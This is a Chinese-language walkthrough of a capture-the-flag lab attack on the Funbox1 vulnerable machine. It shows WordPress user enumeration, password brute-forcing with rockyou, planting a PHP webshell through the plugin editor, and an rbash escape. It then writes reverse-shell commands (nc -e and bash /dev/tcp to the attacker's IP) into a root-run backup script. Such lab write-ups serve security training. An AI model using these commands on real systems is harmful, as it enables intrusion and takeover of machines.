Funbox1:noname靶机渗透练习
首先在这里声明一下,这个funbox系列靶机有一个毛病,反正我这里对于该系列每一个靶机都是一直存在的,具体就是:靶机ova安装之后开启,默认桥接下靶机的网卡是没有被分配ip,需要我们手动修改密码登陆进去之后dhclient [网卡]之后ifconfig才有正确网段ip
具体修改密码方式:重启时长按shift,直到出现一个登陆模式选择框界面,e键进入,在类似于类似于[kernel /vmlinuz-2.6.15 ro root=/dev/hda2]后面加 init=/bin/bash然后重启,mount -no remount,rw /,passwd,输入自己的密码,sync,mount -no remount,ro /即可
拿到这个靶机,还是老步骤,探测信息
靶机mac:00:0C:29:68:95:FE
kali:arp-scan -l或者netdiscover扫描
得到靶机ip:10.174.93.184
探测端口:nmap -sV -A -p- 10.174.93.184
根据nmap结果可以看到开启如下服务及端口:
1.ftp服务开放,看看有没有匿名登陆
2.22ssh端口开放,看看能不能爆破
3.80端口开放http服务,看看网站能不能getshell
测试发现ftp不能匿名登陆
那么看看网站吧
直接访问这个ip发现不行,说什么DNS解析不到访问不了,这个也是很常见的靶机问题了,并且根据网站标题提示可知道这个访问不到的服务器名字为funbox.fritz.box,这时候需要改一下hosts文件,添加一行:10.174.93.184 funbox.fritz.box,然后即可访问
发现网站时wordpress,那么用wpscan扫一扫
扫用户:wpscan --url http://funbox.fritz.box --enumerate u
扫主题:wpscan --url http://funbox.fritz.box --enumerate vt
扫插件:wpscan --url http://funbox.fritz.box --enumerate pt
发现存在两个用户admin和joe,主题和插件都没有发现
那么我们就可以试试继续爆破用户密码
wpscan --url http://funbox.fritz.box -P /usr/share/wordlists/rockyou.txt
发现爆破出来两个用户的密码了
admin/iubire
joe/12345
接下来我们就可以直接去wp-admin用管理员用户登陆看看了
我们主要看看appearance中theme模块以及plugin模块
进入theme editor找到index.php,我们尝试插入一个php木马
保存的时候发现好像无法写入,需要用STFP服务什么的
那么我们就尝试一下plugins editor,修改index.php插入马,发现成功
这时我们得到木马的地址:/wp-content/plugins/akismet/index.php
蚁剑连接成功
得到的是低权限www-data用户组,需要进一步考虑提权问题
可以发现存在两个用户:joe和funny,首先进joe看看发现有一个mbox,但里面什么都没有,可能是存在权限的问题,无法查看具体内容
我们此时想到还有一个点没用呢ssh
ssh登录一下joe看看这个mbox是什么玩意:ssh joe@10.174.93.184
发现里面存在一句话很关键:Hi Joe, please tell funny the backupscript is done.
另外我们刚刚在蚁剑中看到funny中确实有什么backup的文件
根据提示我们到funny中看看相关的文件
此时会出现一个cd /home的rbash的禁止,直接bash -i越过权限,解决
cat .backup.sh
这个文件于bin/bash执行,那么我们是否直接来个反弹shell?
vim写入:nc -e /bin/bash 10.174.20.160 9999
kali段监听:nc -lvvp 9999
发现没反应,应该是因为大多数的靶机没有nc -e指令
那就用老样式:bash -i >/dev/tcp/10.174.20.160/9999 0>&1 2>&1
反弹成功得到root查看flag.txt
74.20.160/9999 0>&1 2>&1
反弹成功得到root查看flag.txt
472
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
